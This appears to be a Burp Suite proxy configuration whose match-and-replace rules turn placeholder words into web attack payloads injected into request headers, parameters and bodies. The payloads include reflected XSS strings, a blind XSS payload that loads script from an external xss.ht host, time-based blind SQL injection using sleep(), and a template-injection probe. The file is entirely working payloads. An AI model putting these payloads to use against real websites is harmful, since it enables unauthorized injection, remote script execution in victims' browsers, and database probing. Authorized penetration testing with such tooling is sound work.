{ "proxy": { "match_replace_rules": [ {

1. {
2. "proxy": {
3. "match_replace_rules": [
4. {
5. "comment": "FUZZ",
6. "enabled": true,
7. "is_simple_match": true,
8. "rule_type": "request_param_value",
9. "string_match": "FUZZ",
10. "string_replace": "([^%22{%3C%27/\\`|%26`/\\%27%3E}%22^])"
11. },
12. {
13. "comment": "FUZZ",
14. "enabled": true,
15. "is_simple_match": true,
16. "rule_type": "request_header",
17. "string_match": "FUZZ",
18. "string_replace": "([^%22{%3C%27/\\`|%26`/\\%27%3E}%22^])"
19. },
20. {
21. "comment": "FUZZ",
22. "enabled": true,
23. "is_simple_match": true,
24. "rule_type": "request_body",
25. "string_match": "FUZZ",
26. "string_replace": "([^\"{<'/\\`|&`/\\'>}\"^])"
27. },
28. {
29. "comment": "XSS/SQL",
30. "enabled": true,
31. "is_simple_match": true,
32. "rule_type": "request_header",
33. "string_match": "tryxss",
34. "string_replace": "%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E"
35. },
36. {
37. "comment": "XSS/SQL",
38. "enabled": true,
39. "is_simple_match": true,
40. "rule_type": "request_body",
41. "string_match": "tryxss",
42. "string_replace": "'\"><img src=x onerror=alert(1)>"
43. },
44. {
45. "comment": "XSS/SQL",
46. "enabled": true,
47. "is_simple_match": true,
48. "rule_type": "request_param_value",
49. "string_match": "tryxss",
50. "string_replace": "%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E"
51. },
52. {
53. "comment": "BLIND XSS",
54. "enabled": true,
55. "is_simple_match": true,
56. "rule_type": "request_body",
57. "string_match": "bxss",
58. "string_replace": "'\"><script src=\"https://saharah4xor1.xss.ht/\"></script><h1>"
59. },
60. {
61. "comment": "BLIN D XSS",
62. "enabled": true,
63. "is_simple_match": true,
64. "rule_type": "request_param_value",
65. "string_match": "bxss",
66. "string_replace": "x%27%22%3E%3Cscript%20src=%22https://saharah4xor1.xss.ht/%22%3E%3C/script%3E"
67. },
68. {
69. "comment": "BLIN D XSS",
70. "enabled": true,
71. "is_simple_match": true,
72. "rule_type": "request_header",
73. "string_match": "bxss",
74. "string_replace": "x%27%22%3E%3Cscript%20src=%22https://saharah4xor1.xss.ht/%22%3E%3C/script%3E"
75. },
76. {
77. "comment": "Blind SQL",
78. "enabled": true,
79. "is_simple_match": true,
80. "rule_type": "request_header",
81. "string_match": "B-SQL",
82. "string_replace": "+(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(12)))v)+'\"+(select(0)from(select(sleep(10)))v)+\"*/"
83. },
84. {
85. "comment": "Blind SQL",
86. "enabled": true,
87. "is_simple_match": true,
88. "rule_type": "request_body",
89. "string_match": "B-SQL",
90. "string_replace": "if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'\"XOR(if(now()=sysdate(),sleep(9),0))OR\"*/"
91. },
92. {
93. "comment": "Blind SQL",
94. "enabled": true,
95. "is_simple_match": true,
96. "rule_type": "request_param_value",
97. "string_match": "B-SQL",
98. "string_replace": "if(now()=sysdate(),sleep(9),0)/*%27XOR(if(now()=sysdate(),sleep(9),0))OR%27\"XOR(if(now()=sysdate(),sleep(9),0))OR\"*/"
99. },
100. {
101. "comment": "Mixed Bugs",
102. "enabled": true,
103. "is_simple_match": true,
104. "rule_type": "request_header",
105. "string_match": "mixedbugs",
106. "string_replace": "%27%22%3E%3Csvg%2Fonload%3Dalert()%3E%7B%7B7*7%7D%7D"
107. },
108. {
109. "comment": "Mixed Bugs",
110. "enabled": true,
111. "is_simple_match": true,
112. "rule_type": "request_body",
113. "string_match": "mixedbugs",
114. "string_replace": "'\"><svg/onload=alert()>{{7*7}}"
115. },
116. {
117. "comment": "Mixed Bugs",
118. "enabled": true,
119. "is_simple_match": true,
120. "rule_type": "request_param_value",
121. "string_match": "mixedbugs",
122. "string_replace": "%27%22%3E%3Csvg%2Fonload%3Dalert()%3E%7B%7B7*7%7D%7D"
123. }
124. ]
125. }
126. }